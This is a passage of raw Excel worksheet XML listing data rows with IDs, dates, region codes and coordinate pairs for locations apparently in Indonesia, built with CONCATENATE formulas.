        <v>1473021005</v>
      </c>
      <c r="N2369">
        <v>1473021</v>
      </c>
      <c r="O2369">
        <v>1473</v>
      </c>
      <c r="P2369">
        <v>14</v>
      </c>
      <c r="Q2369" t="s">
        <v>7972</v>
      </c>
      <c r="R2369" t="s">
        <v>7973</v>
      </c>
      <c r="S2369" t="s">
        <v>7939</v>
      </c>
      <c r="T2369" t="s">
        <v>7404</v>
      </c>
      <c r="U2369" s="5">
        <v>10142046</v>
      </c>
      <c r="V2369" s="5" t="s">
        <v>16563</v>
      </c>
      <c r="W2369" s="5">
        <v>166656</v>
      </c>
      <c r="X2369" t="s">
        <v>20306</v>
      </c>
      <c r="Y2369" t="str">
        <f t="shared" si="36"/>
        <v>1.66656,101.42046</v>
      </c>
    </row>
    <row r="2370" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2370">
        <v>208350</v>
      </c>
      <c r="B2370" s="1">
        <v>44102</v>
      </c>
      <c r="C2370" s="2">
        <v>0.44097222222222227</v>
      </c>
      <c r="D2370" t="s">
        <v>2648</v>
      </c>
      <c r="E2370" t="s">
        <v>23</v>
      </c>
      <c r="G2370" t="s">
        <v>7974</v>
      </c>
      <c r="H2370" t="s">
        <v>26</v>
      </c>
      <c r="J2370" t="s">
        <v>6567</v>
      </c>
      <c r="L2370" t="s">
        <v>7975</v>
      </c>
      <c r="M2370">
        <v>3174040004</v>
      </c>
      <c r="N2370">
        <v>3174040</v>
      </c>
      <c r="O2370">
        <v>3174</v>
      </c>
      <c r="P2370">
        <v>31</v>
      </c>
      <c r="Q2370" t="s">
        <v>5091</v>
      </c>
      <c r="R2370" t="s">
        <v>377</v>
      </c>
      <c r="S2370" t="s">
        <v>32</v>
      </c>
      <c r="T2370" t="s">
        <v>33</v>
      </c>
      <c r="U2370" s="5">
        <v>10679000</v>
      </c>
      <c r="V2370" s="5" t="s">
        <v>16564</v>
      </c>
      <c r="W2370" s="5">
        <v>-616621</v>
      </c>
      <c r="X2370" t="s">
        <v>20307</v>
      </c>
      <c r="Y2370" t="str">
        <f t="shared" si="36"/>
        <v>-6.16621,106.79000</v>
      </c>
    </row>
    <row r="2371" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2371">
        <v>208362</v>
      </c>
      <c r="B2371" s="1">
        <v>44103</v>
      </c>
      <c r="C2371" s="2">
        <v>6.0046296296296292E-2</v>
      </c>
      <c r="D2371" t="s">
        <v>22</v>
      </c>
      <c r="E2371" t="s">
        <v>23</v>
      </c>
      <c r="F2371" t="s">
        <v>7976</v>
      </c>
      <c r="G2371" t="s">
        <v>7977</v>
      </c>
      <c r="H2371" t="s">
        <v>7978</v>
      </c>
      <c r="I2371" t="s">
        <v>7979</v>
      </c>
      <c r="J2371" t="s">
        <v>2627</v>
      </c>
      <c r="L2371" t="s">
        <v>7980</v>
      </c>
      <c r="M2371">
        <v>3201010005</v>
      </c>
      <c r="N2371">
        <v>3201010</v>
      </c>
      <c r="O2371">
        <v>3201</v>
      </c>
      <c r="P2371">
        <v>32</v>
      </c>
      <c r="Q2371" t="s">
        <v>7981</v>
      </c>
      <c r="R2371" t="s">
        <v>7981</v>
      </c>
      <c r="S2371" t="s">
        <v>421</v>
      </c>
      <c r="T2371" t="s">
        <v>42</v>
      </c>
      <c r="U2371" s="5">
        <v>10652635</v>
      </c>
      <c r="V2371" s="5" t="s">
        <v>16565</v>
      </c>
      <c r="W2371" s="5">
        <v>-661666</v>
      </c>
      <c r="X2371" t="s">
        <v>20308</v>
      </c>
      <c r="Y2371" t="str">
        <f t="shared" ref="Y2371:Y2434" si="37">CONCATENATE(X2371,",",V2371)</f>
        <v>-6.61666,106.52635</v>
      </c>
    </row>
    <row r="2372" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2372">
        <v>208363</v>
      </c>
      <c r="B2372" s="1">
        <v>44103</v>
      </c>
      <c r="C2372" s="2">
        <v>0.65300925925925923</v>
      </c>
      <c r="D2372" t="s">
        <v>22</v>
      </c>
      <c r="E2372" t="s">
        <v>23</v>
      </c>
      <c r="F2372" t="s">
        <v>7982</v>
      </c>
      <c r="H2372" t="s">
        <v>7978</v>
      </c>
      <c r="I2372" t="s">
        <v>7983</v>
      </c>
      <c r="J2372" t="s">
        <v>6038</v>
      </c>
      <c r="L2372" t="s">
        <v>7984</v>
      </c>
      <c r="M2372">
        <v>1275110002</v>
      </c>
      <c r="N2372">
        <v>1275110</v>
      </c>
      <c r="O2372">
        <v>1275</v>
      </c>
      <c r="P2372">
        <v>12</v>
      </c>
      <c r="Q2372" t="s">
        <v>7985</v>
      </c>
      <c r="R2372" t="s">
        <v>7986</v>
      </c>
      <c r="S2372" t="s">
        <v>7704</v>
      </c>
      <c r="T2372" t="s">
        <v>6043</v>
      </c>
      <c r="U2372" s="5">
        <v>9863755</v>
      </c>
      <c r="V2372" s="5" t="s">
        <v>16566</v>
      </c>
      <c r="W2372" s="5">
        <v>357345</v>
      </c>
      <c r="X2372" t="s">
        <v>20230</v>
      </c>
      <c r="Y2372" t="str">
        <f t="shared" si="37"/>
        <v>3.57345,98.63755</v>
      </c>
    </row>
    <row r="2373" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2373">
        <v>208369</v>
      </c>
      <c r="B2373" s="1">
        <v>44106</v>
      </c>
      <c r="C2373" s="2">
        <v>0.41951388888888891</v>
      </c>
      <c r="D2373" t="s">
        <v>22</v>
      </c>
      <c r="E2373" t="s">
        <v>23</v>
      </c>
      <c r="F2373" t="s">
        <v>7987</v>
      </c>
      <c r="G2373" t="s">
        <v>7988</v>
      </c>
      <c r="H2373" t="s">
        <v>26</v>
      </c>
      <c r="I2373" t="s">
        <v>1909</v>
      </c>
      <c r="J2373" t="s">
        <v>3135</v>
      </c>
      <c r="L2373" t="s">
        <v>7989</v>
      </c>
      <c r="M2373">
        <v>3603070009</v>
      </c>
      <c r="N2373">
        <v>3603070</v>
      </c>
      <c r="O2373">
        <v>3603</v>
      </c>
      <c r="P2373">
        <v>36</v>
      </c>
      <c r="Q2373" t="s">
        <v>7990</v>
      </c>
      <c r="R2373" t="s">
        <v>7991</v>
      </c>
      <c r="S2373" t="s">
        <v>201</v>
      </c>
      <c r="T2373" t="s">
        <v>171</v>
      </c>
      <c r="U2373" s="5">
        <v>10660184</v>
      </c>
      <c r="V2373" s="5" t="s">
        <v>16567</v>
      </c>
      <c r="W2373" s="5">
        <v>-627597</v>
      </c>
      <c r="X2373" t="s">
        <v>20309</v>
      </c>
      <c r="Y2373" t="str">
        <f t="shared" si="37"/>
        <v>-6.27597,106.60184</v>
      </c>
    </row>
    <row r="2374" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2374">
        <v>208371</v>
      </c>
      <c r="B2374" s="1">
        <v>44107</v>
      </c>
      <c r="C2374" s="2">
        <v>6.4803240740740745E-2</v>
      </c>
      <c r="D2374" t="s">
        <v>85</v>
      </c>
      <c r="E2374" t="s">
        <v>23</v>
      </c>
      <c r="F2374" t="s">
        <v>7992</v>
      </c>
      <c r="G2374" t="s">
        <v>7993</v>
      </c>
      <c r="H2374" t="s">
        <v>26</v>
      </c>
      <c r="J2374" t="s">
        <v>2622</v>
      </c>
      <c r="K2374" t="s">
        <v>7994</v>
      </c>
      <c r="L2374" t="s">
        <v>7995</v>
      </c>
      <c r="M2374">
        <v>3502190004</v>
      </c>
      <c r="N2374">
        <v>3502190</v>
      </c>
      <c r="O2374">
        <v>3502</v>
      </c>
      <c r="P2374">
        <v>35</v>
      </c>
      <c r="Q2374" t="s">
        <v>7996</v>
      </c>
      <c r="R2374" t="s">
        <v>7997</v>
      </c>
      <c r="S2374" t="s">
        <v>7998</v>
      </c>
      <c r="T2374" t="s">
        <v>1221</v>
      </c>
      <c r="U2374" s="5">
        <v>11151334</v>
      </c>
      <c r="V2374" s="5" t="s">
        <v>16568</v>
      </c>
      <c r="W2374" s="5">
        <v>-784508</v>
      </c>
      <c r="X2374" t="s">
        <v>20310</v>
      </c>
      <c r="Y2374" t="str">
        <f t="shared" si="37"/>
        <v>-7.84508,111.51334</v>
      </c>
    </row>
    <row r="2375" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2375">
        <v>208372</v>
      </c>
      <c r="B2375" s="1">
        <v>44107</v>
      </c>
      <c r="C2375" s="2">
        <v>0.56442129629629634</v>
      </c>
      <c r="D2375" t="s">
        <v>22</v>
      </c>
      <c r="E2375" t="s">
        <v>23</v>
      </c>
      <c r="F2375" t="s">
        <v>7999</v>
      </c>
      <c r="G2375" t="s">
        <v>8000</v>
      </c>
      <c r="H2375" t="s">
        <v>26</v>
      </c>
      <c r="I2375" t="s">
        <v>137</v>
      </c>
      <c r="J2375" t="s">
        <v>8001</v>
      </c>
      <c r="L2375" t="s">
        <v>8002</v>
      </c>
      <c r="M2375">
        <v>8171010013</v>
      </c>
      <c r="N2375">
        <v>8171010</v>
      </c>
      <c r="O2375">
        <v>8171</v>
      </c>
      <c r="P2375">
        <v>81</v>
      </c>
      <c r="Q2375" t="s">
        <v>8003</v>
      </c>
      <c r="R2375" t="s">
        <v>8004</v>
      </c>
      <c r="S2375" t="s">
        <v>8005</v>
      </c>
      <c r="T2375" t="s">
        <v>8006</v>
      </c>
      <c r="U2375" s="5">
        <v>12817801</v>
      </c>
      <c r="V2375" s="5" t="s">
        <v>16569</v>
      </c>
      <c r="W2375" s="5">
        <v>-369914</v>
      </c>
      <c r="X2375" t="s">
        <v>20311</v>
      </c>
      <c r="Y2375" t="str">
        <f t="shared" si="37"/>
        <v>-3.69914,128.17801</v>
      </c>
    </row>
    <row r="2376" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2376">
        <v>208373</v>
      </c>
      <c r="B2376" s="1">
        <v>44108</v>
      </c>
      <c r="C2376" s="2">
        <v>0.22500000000000001</v>
      </c>
      <c r="D2376" t="s">
        <v>2648</v>
      </c>
      <c r="E2376" t="s">
        <v>23</v>
      </c>
      <c r="G2376" t="s">
        <v>8007</v>
      </c>
      <c r="H2376" t="s">
        <v>26</v>
      </c>
      <c r="J2376" t="s">
        <v>2627</v>
      </c>
      <c r="L2376" t="s">
        <v>8008</v>
      </c>
      <c r="M2376">
        <v>3216081006</v>
      </c>
      <c r="N2376">
        <v>3216081</v>
      </c>
      <c r="O2376">
        <v>3216</v>
      </c>
      <c r="P2376">
        <v>32</v>
      </c>
      <c r="Q2376" t="s">
        <v>2511</v>
      </c>
      <c r="R2376" t="s">
        <v>2512</v>
      </c>
      <c r="S2376" t="s">
        <v>41</v>
      </c>
      <c r="T2376" t="s">
        <v>42</v>
      </c>
      <c r="U2376" s="5">
        <v>10704561</v>
      </c>
      <c r="V2376" s="5" t="s">
        <v>16570</v>
      </c>
      <c r="W2376" s="5">
        <v>-623805</v>
      </c>
      <c r="X2376" t="s">
        <v>20312</v>
      </c>
      <c r="Y2376" t="str">
        <f t="shared" si="37"/>
        <v>-6.23805,107.04561</v>
      </c>
    </row>
    <row r="2377" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2377">
        <v>208374</v>
      </c>
      <c r="B2377" s="1">
        <v>44108</v>
      </c>
      <c r="C2377" s="2">
        <v>0.22361111111111109</v>
      </c>
      <c r="D2377" t="s">
        <v>2648</v>
      </c>
      <c r="E2377" t="s">
        <v>23</v>
      </c>
      <c r="G2377" t="s">
        <v>8009</v>
      </c>
      <c r="H2377" t="s">
        <v>26</v>
      </c>
      <c r="J2377" t="s">
        <v>2627</v>
      </c>
      <c r="L2377" t="s">
        <v>8010</v>
      </c>
      <c r="M2377">
        <v>3216081006</v>
      </c>
      <c r="N2377">
        <v>3216081</v>
      </c>
      <c r="O2377">
        <v>3216</v>
      </c>
      <c r="P2377">
        <v>32</v>
      </c>
      <c r="Q2377" t="s">
        <v>2511</v>
      </c>
      <c r="R2377" t="s">
        <v>2512</v>
      </c>
      <c r="S2377" t="s">
        <v>41</v>
      </c>
      <c r="T2377" t="s">
        <v>42</v>
      </c>
      <c r="U2377" s="5">
        <v>10704565</v>
      </c>
      <c r="V2377" s="5" t="s">
        <v>16571</v>
      </c>
      <c r="W2377" s="5">
        <v>-623792</v>
      </c>
      <c r="X2377" t="s">
        <v>20313</v>
      </c>
      <c r="Y2377" t="str">
        <f t="shared" si="37"/>
        <v>-6.23792,107.04565</v>
      </c>
    </row>
    <row r="2378" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2378">
        <v>208379</v>
      </c>
      <c r="B2378" s="1">
        <v>44108</v>
      </c>
      <c r="C2378" s="2">
        <v>0.3298611111111111</v>
      </c>
      <c r="D2378" t="s">
        <v>2648</v>
      </c>
      <c r="E2378" t="s">
        <v>23</v>
      </c>
      <c r="G2378" t="s">
        <v>8011</v>
      </c>
      <c r="H2378" t="s">
        <v>26</v>
      </c>
      <c r="J2378" t="s">
        <v>3371</v>
      </c>
      <c r="L2378" t="s">
        <v>8012</v>
      </c>
      <c r="M2378">
        <v>3172070001</v>
      </c>
      <c r="N2378">
        <v>3172070</v>
      </c>
      <c r="O2378">
        <v>3172</v>
      </c>
      <c r="P2378">
        <v>31</v>
      </c>
      <c r="Q2378" t="s">
        <v>127</v>
      </c>
      <c r="R2378" t="s">
        <v>128</v>
      </c>
      <c r="S2378" t="s">
        <v>49</v>
      </c>
      <c r="T2378" t="s">
        <v>33</v>
      </c>
      <c r="U2378" s="5">
        <v>10689365</v>
      </c>
      <c r="V2378" s="5" t="s">
        <v>16572</v>
      </c>
      <c r="W2378" s="5">
        <v>-622744</v>
      </c>
      <c r="X2378" t="s">
        <v>20314</v>
      </c>
      <c r="Y2378" t="str">
        <f t="shared" si="37"/>
        <v>-6.22744,106.89365</v>
      </c>
    </row>
    <row r="2379" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2379">
        <v>208380</v>
      </c>
      <c r="B2379" s="1">
        <v>44108</v>
      </c>
      <c r="C2379" s="2">
        <v>0.32847222222222222</v>
      </c>
      <c r="D2379" t="s">
        <v>2648</v>
      </c>
      <c r="E2379" t="s">
        <v>23</v>
      </c>
      <c r="G2379" t="s">
        <v>8013</v>
      </c>
      <c r="H2379" t="s">
        <v>26</v>
      </c>
      <c r="J2379" t="s">
        <v>3371</v>
      </c>
      <c r="L2379" t="s">
        <v>2766</v>
      </c>
      <c r="M2379">
        <v>3172070001</v>
      </c>
      <c r="N2379">
        <v>3172070</v>
      </c>
      <c r="O2379">
        <v>3172</v>
      </c>
      <c r="P2379">
        <v>31</v>
      </c>
      <c r="Q2379" t="s">
        <v>127</v>
      </c>
      <c r="R2379" t="s">
        <v>128</v>
      </c>
      <c r="S2379" t="s">
        <v>49</v>
      </c>
      <c r="T2379" t="s">
        <v>33</v>
      </c>
      <c r="U2379" s="5">
        <v>10689346</v>
      </c>
      <c r="V2379" s="5" t="s">
        <v>16573</v>
      </c>
      <c r="W2379" s="5">
        <v>-622747</v>
      </c>
      <c r="X2379" t="s">
        <v>20315</v>
      </c>
      <c r="Y2379" t="str">
        <f t="shared" si="37"/>
        <v>-6.22747,106.89346</v>
      </c>
    </row>
    <row r="2380" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2380">
        <v>208381</v>
      </c>
      <c r="B2380" s="1">
        <v>44108</v>
      </c>
      <c r="C2380" s="2">
        <v>0.58888888888888891</v>
      </c>
      <c r="D2380" t="s">
        <v>2648</v>
      </c>
      <c r="E2380" t="s">
        <v>23</v>
      </c>
      <c r="G2380" t="s">
        <v>8014</v>
      </c>
      <c r="H2380" t="s">
        <v>26</v>
      </c>
      <c r="J2380" t="s">
        <v>5026</v>
      </c>
      <c r="L2380" t="s">
        <v>8015</v>
      </c>
      <c r="M2380">
        <v>3171060004</v>
      </c>
      <c r="N2380">
        <v>3171060</v>
      </c>
      <c r="O2380">
        <v>3171</v>
      </c>
      <c r="P2380">
        <v>31</v>
      </c>
      <c r="Q2380" t="s">
        <v>5027</v>
      </c>
      <c r="R2380" t="s">
        <v>1236</v>
      </c>
      <c r="S2380" t="s">
        <v>108</v>
      </c>
      <c r="T2380" t="s">
        <v>33</v>
      </c>
      <c r="U2380" s="5">
        <v>10680927</v>
      </c>
      <c r="V2380" s="5" t="s">
        <v>16574</v>
      </c>
      <c r="W2380" s="5">
        <v>-624557</v>
      </c>
      <c r="X2380" t="s">
        <v>20316</v>
      </c>
      <c r="Y2380" t="str">
        <f t="shared" si="37"/>
        <v>-6.24557,106.80927</v>
      </c>
    </row>
    <row r="2381" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2381">
        <v>208383</v>
      </c>
      <c r="B2381" s="1">
        <v>44108</v>
      </c>
      <c r="C2381" s="2">
        <v>0.59583333333333333</v>
      </c>
      <c r="D2381" t="s">
        <v>2648</v>
      </c>
      <c r="E2381" t="s">
        <v>23</v>
      </c>
      <c r="G2381" t="s">
        <v>8016</v>
      </c>
      <c r="H2381" t="s">
        <v>26</v>
      </c>
      <c r="J2381" t="s">
        <v>5647</v>
      </c>
      <c r="L2381" t="s">
        <v>8017</v>
      </c>
      <c r="M2381">
        <v>3171020006</v>
      </c>
      <c r="N2381">
        <v>3171020</v>
      </c>
      <c r="O2381">
        <v>3171</v>
      </c>
      <c r="P2381">
        <v>31</v>
      </c>
      <c r="Q2381" t="s">
        <v>499</v>
      </c>
      <c r="R2381" t="s">
        <v>484</v>
      </c>
      <c r="S2381" t="s">
        <v>108</v>
      </c>
      <c r="T2381" t="s">
        <v>33</v>
      </c>
      <c r="U2381" s="5">
        <v>10683489</v>
      </c>
      <c r="V2381" s="5" t="s">
        <v>16147</v>
      </c>
      <c r="W2381" s="5">
        <v>-627547</v>
      </c>
      <c r="X2381" t="s">
        <v>20317</v>
      </c>
      <c r="Y2381" t="str">
        <f t="shared" si="37"/>
        <v>-6.27547,106.83489</v>
      </c>
    </row>
    <row r="2382" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2382">
        <v>208386</v>
      </c>
      <c r="B2382" s="1">
        <v>44108</v>
      </c>
      <c r="C2382" s="2">
        <v>0.59930555555555554</v>
      </c>
      <c r="D2382" t="s">
        <v>2648</v>
      </c>
      <c r="E2382" t="s">
        <v>23</v>
      </c>
      <c r="G2382" t="s">
        <v>8018</v>
      </c>
      <c r="H2382" t="s">
        <v>26</v>
      </c>
      <c r="J2382" t="s">
        <v>5647</v>
      </c>
      <c r="L2382" t="s">
        <v>8019</v>
      </c>
      <c r="M2382">
        <v>3171020006</v>
      </c>
      <c r="N2382">
        <v>3171020</v>
      </c>
      <c r="O2382">
        <v>3171</v>
      </c>
      <c r="P2382">
        <v>31</v>
      </c>
      <c r="Q2382" t="s">
        <v>499</v>
      </c>
      <c r="R2382" t="s">
        <v>484</v>
      </c>
      <c r="S2382" t="s">
        <v>108</v>
      </c>
      <c r="T2382" t="s">
        <v>33</v>
      </c>
      <c r="U2382" s="5">
        <v>10683492</v>
      </c>
      <c r="V2382" s="5" t="s">
        <v>16575</v>
      </c>
      <c r="W2382" s="5">
        <v>-627544</v>
      </c>
      <c r="X2382" t="s">
        <v>20318</v>
      </c>
      <c r="Y2382" t="str">
        <f t="shared" si="37"/>
        <v>-6.27544,106.83492</v>
      </c>
    </row>
    <row r="2383" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2383">
        <v>208392</v>
      </c>
      <c r="B2383" s="1">
        <v>44108</v>
      </c>
      <c r="C2383" s="2">
        <v>0.6069444444444444</v>
      </c>
      <c r="D2383" t="s">
        <v>2648</v>
      </c>
      <c r="E2383" t="s">
        <v>23</v>
      </c>
      <c r="G2383" t="s">
        <v>8020</v>
      </c>
      <c r="H2383" t="s">
        <v>26</v>
      </c>
      <c r="J2383" t="s">
        <v>5647</v>
      </c>
      <c r="L2383" t="s">
        <v>8021</v>
      </c>
      <c r="M2383">
        <v>3171020006</v>
      </c>
      <c r="N2383">
        <v>3171020</v>
      </c>
      <c r="O2383">
        <v>3171</v>
      </c>
      <c r="P2383">
        <v>31</v>
      </c>
      <c r="Q2383" t="s">
        <v>499</v>
      </c>
      <c r="R2383" t="s">
        <v>484</v>
      </c>
      <c r="S2383" t="s">
        <v>108</v>
      </c>
      <c r="T2383" t="s">
        <v>33</v>
      </c>
      <c r="U2383" s="5">
        <v>10683497</v>
      </c>
      <c r="V2383" s="5" t="s">
        <v>16576</v>
      </c>
      <c r="W2383" s="5">
        <v>-627546</v>
      </c>
      <c r="X2383" t="s">
        <v>20319</v>
      </c>
      <c r="Y2383" t="str">
        <f t="shared" si="37"/>
        <v>-6.27546,106.83497</v>
      </c>
    </row>
    <row r="2384" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2384">
        <v>208411</v>
      </c>
      <c r="B2384" s="1">
        <v>44108</v>
      </c>
      <c r="C2384" s="2">
        <v>0.62559027777777776</v>
      </c>
      <c r="D2384" t="s">
        <v>22</v>
      </c>
      <c r="E2384" t="s">
        <v>23</v>
      </c>
      <c r="F2384" t="s">
        <v>8022</v>
      </c>
      <c r="G2384" t="s">
        <v>8023</v>
      </c>
      <c r="H2384" t="s">
        <v>26</v>
      </c>
      <c r="I2384" t="s">
        <v>2165</v>
      </c>
      <c r="J2384" t="s">
        <v>8024</v>
      </c>
      <c r="M2384">
        <v>3171050006</v>
      </c>
      <c r="N2384">
        <v>3171050</v>
      </c>
      <c r="O2384">
        <v>3171</v>
      </c>
      <c r="P2384">
        <v>31</v>
      </c>
      <c r="Q2384" t="s">
        <v>1501</v>
      </c>
      <c r="R2384" t="s">
        <v>508</v>
      </c>
      <c r="S2384" t="s">
        <v>108</v>
      </c>
      <c r="T2384" t="s">
        <v>33</v>
      </c>
      <c r="U2384" s="5">
        <v>10679429</v>
      </c>
      <c r="V2384" s="5" t="s">
        <v>16577</v>
      </c>
      <c r="W2384" s="5">
        <v>-621232</v>
      </c>
      <c r="X2384" t="s">
        <v>20320</v>
      </c>
      <c r="Y2384" t="str">
        <f t="shared" si="37"/>
        <v>-6.21232,106.79429</v>
      </c>
    </row>
    <row r="2385" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2385">
        <v>208424</v>
      </c>
      <c r="B2385" s="1">
        <v>44108</v>
      </c>
      <c r="C2385" s="2">
        <v>0.63432870370370364</v>
      </c>
      <c r="D2385" t="s">
        <v>22</v>
      </c>
      <c r="E2385" t="s">
        <v>23</v>
      </c>
      <c r="F2385" t="s">
        <v>8025</v>
      </c>
      <c r="H2385" t="s">
        <v>26</v>
      </c>
      <c r="I2385" t="s">
        <v>137</v>
      </c>
      <c r="J2385" t="s">
        <v>2627</v>
      </c>
      <c r="L2385" t="s">
        <v>2794</v>
      </c>
      <c r="M2385">
        <v>3276020009</v>
      </c>
      <c r="N2385">
        <v>3276020</v>
      </c>
      <c r="O2385">
        <v>3276</v>
      </c>
      <c r="P2385">
        <v>32</v>
      </c>
      <c r="Q2385" t="s">
        <v>8026</v>
      </c>
      <c r="R2385" t="s">
        <v>8026</v>
      </c>
      <c r="S2385" t="s">
        <v>185</v>
      </c>
      <c r="T2385" t="s">
        <v>42</v>
      </c>
      <c r="U2385" s="5">
        <v>10680726</v>
      </c>
      <c r="V2385" s="5" t="s">
        <v>16578</v>
      </c>
      <c r="W2385" s="5">
        <v>-639596</v>
      </c>
      <c r="X2385" t="s">
        <v>20321</v>
      </c>
      <c r="Y2385" t="str">
        <f t="shared" si="37"/>
        <v>-6.39596,106.80726</v>
      </c>
    </row>
    <row r="2386" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2386">
        <v>208441</v>
      </c>
      <c r="B2386" s="1">
        <v>44108</v>
      </c>
      <c r="C2386" s="2">
        <v>0.64689814814814817</v>
      </c>
      <c r="D2386" t="s">
        <v>22</v>
      </c>
      <c r="E2386" t="s">
        <v>23</v>
      </c>
      <c r="F2386" t="s">
        <v>8027</v>
      </c>
      <c r="G2386" t="s">
        <v>8028</v>
      </c>
      <c r="H2386" t="s">
        <v>26</v>
      </c>
      <c r="I2386" t="s">
        <v>137</v>
      </c>
      <c r="J2386" t="s">
        <v>2627</v>
      </c>
      <c r="L2386" t="s">
        <v>8029</v>
      </c>
      <c r="M2386">
        <v>3276020010</v>
      </c>
      <c r="N2386">
        <v>3276020</v>
      </c>
      <c r="O2386">
        <v>3276</v>
      </c>
      <c r="P2386">
        <v>32</v>
      </c>
      <c r="Q2386" t="s">
        <v>8030</v>
      </c>
      <c r="R2386" t="s">
        <v>8026</v>
      </c>
      <c r="S2386" t="s">
        <v>185</v>
      </c>
      <c r="T2386" t="s">
        <v>42</v>
      </c>
      <c r="U2386" s="5">
        <v>10681028</v>
      </c>
      <c r="V2386" s="5" t="s">
        <v>16579</v>
      </c>
      <c r="W2386" s="5">
        <v>-638975</v>
      </c>
      <c r="X2386" t="s">
        <v>20322</v>
      </c>
      <c r="Y2386" t="str">
        <f t="shared" si="37"/>
        <v>-6.38975,106.81028</v>
      </c>
    </row>
    <row r="2387" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2387">
        <v>208473</v>
      </c>
      <c r="B2387" s="1">
        <v>44108</v>
      </c>
      <c r="C2387" s="2">
        <v>0.67222222222222217</v>
      </c>
      <c r="D2387" t="s">
        <v>2648</v>
      </c>
      <c r="E2387" t="s">
        <v>23</v>
      </c>
      <c r="G2387" t="s">
        <v>8031</v>
      </c>
      <c r="H2387" t="s">
        <v>26</v>
      </c>
      <c r="J2387" t="s">
        <v>5647</v>
      </c>
      <c r="L2387" t="s">
        <v>8032</v>
      </c>
      <c r="M2387">
        <v>3171020006</v>
      </c>
      <c r="N2387">
        <v>3171020</v>
      </c>
      <c r="O2387">
        <v>3171</v>
      </c>
      <c r="P2387">
        <v>31</v>
      </c>
      <c r="Q2387" t="s">
        <v>499</v>
      </c>
      <c r="R2387" t="s">
        <v>484</v>
      </c>
      <c r="S2387" t="s">
        <v>108</v>
      </c>
      <c r="T2387" t="s">
        <v>33</v>
      </c>
      <c r="U2387" s="5">
        <v>10683495</v>
      </c>
      <c r="V2387" s="5" t="s">
        <v>16580</v>
      </c>
      <c r="W2387" s="5">
        <v>-627536</v>
      </c>
      <c r="X2387" t="s">
        <v>20323</v>
      </c>
      <c r="Y2387" t="str">
        <f t="shared" si="37"/>
        <v>-6.27536,106.83495</v>
      </c>
    </row>
    <row r="2388" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2388">
        <v>208475</v>
      </c>
      <c r="B2388" s="1">
        <v>44108</v>
      </c>
      <c r="C2388" s="2">
        <v>0.67768518518518517</v>
      </c>
      <c r="D2388" t="s">
        <v>22</v>
      </c>
      <c r="E2388" t="s">
        <v>23</v>
      </c>
      <c r="F2388" s="3" t="s">
        <v>8033</v>
      </c>
      <c r="G2388" t="s">
        <v>8034</v>
      </c>
      <c r="H2388" t="s">
        <v>26</v>
      </c>
      <c r="I2388" t="s">
        <v>290</v>
      </c>
      <c r="J2388" t="s">
        <v>4142</v>
      </c>
      <c r="L2388" t="s">
        <v>8035</v>
      </c>
      <c r="M2388">
        <v>3171040004</v>
      </c>
      <c r="N2388">
        <v>3171040</v>
      </c>
      <c r="O2388">
        <v>3171</v>
      </c>
      <c r="P2388">
        <v>31</v>
      </c>
      <c r="Q2388" t="s">
        <v>4144</v>
      </c>
      <c r="R2388" t="s">
        <v>163</v>
      </c>
      <c r="S2388" t="s">
        <v>108</v>
      </c>
      <c r="T2388" t="s">
        <v>33</v>
      </c>
      <c r="U2388" s="5">
        <v>10675967</v>
      </c>
      <c r="V2388" s="5" t="s">
        <v>16581</v>
      </c>
      <c r="W2388" s="5">
        <v>-623886</v>
      </c>
      <c r="X2388" t="s">
        <v>20324</v>
      </c>
      <c r="Y2388" t="str">
        <f t="shared" si="37"/>
        <v>-6.23886,106.75967</v>
      </c>
    </row>
    <row r="2389" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2389">
        <v>208701</v>
      </c>
      <c r="B2389" s="1">
        <v>44108</v>
      </c>
      <c r="C2389" s="2">
        <v>0.83209490740740744</v>
      </c>
      <c r="D2389" t="s">
        <v>22</v>
      </c>
      <c r="E2389" t="s">
        <v>23</v>
      </c>
      <c r="F2389" t="s">
        <v>8036</v>
      </c>
      <c r="G2389" t="s">
        <v>8037</v>
      </c>
      <c r="H2389" t="s">
        <v>26</v>
      </c>
      <c r="I2389" t="s">
        <v>80</v>
      </c>
      <c r="J2389" t="s">
        <v>5831</v>
      </c>
      <c r="L2389" t="s">
        <v>8038</v>
      </c>
      <c r="M2389">
        <v>3171070001</v>
      </c>
      <c r="N2389">
        <v>3171070</v>
      </c>
      <c r="O2389">
        <v>3171</v>
      </c>
      <c r="P2389">
        <v>31</v>
      </c>
      <c r="Q2389" t="s">
        <v>120</v>
      </c>
      <c r="R2389" t="s">
        <v>121</v>
      </c>
      <c r="S2389" t="s">
        <v>108</v>
      </c>
      <c r="T2389" t="s">
        <v>33</v>
      </c>
      <c r="U2389" s="5">
        <v>10681411</v>
      </c>
      <c r="V2389" s="5" t="s">
        <v>16582</v>
      </c>
      <c r="W2389" s="5">
        <v>-627162</v>
      </c>
      <c r="X2389" t="s">
        <v>20325</v>
      </c>
      <c r="Y2389" t="str">
        <f t="shared" si="37"/>
        <v>-6.27162,106.81411</v>
      </c>
    </row>
    <row r="2390" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2390">
        <v>208907</v>
      </c>
      <c r="B2390" s="1">
        <v>44108</v>
      </c>
      <c r="C2390" s="2">
        <v>0.94438657407407411</v>
      </c>
      <c r="D2390" t="s">
        <v>85</v>
      </c>
      <c r="E2390" t="s">
        <v>23</v>
      </c>
      <c r="F2390" t="s">
        <v>8039</v>
      </c>
      <c r="G2390" t="s">
        <v>8040</v>
      </c>
      <c r="H2390" t="s">
        <v>26</v>
      </c>
      <c r="J2390" t="s">
        <v>1371</v>
      </c>
      <c r="K2390" t="s">
        <v>8041</v>
      </c>
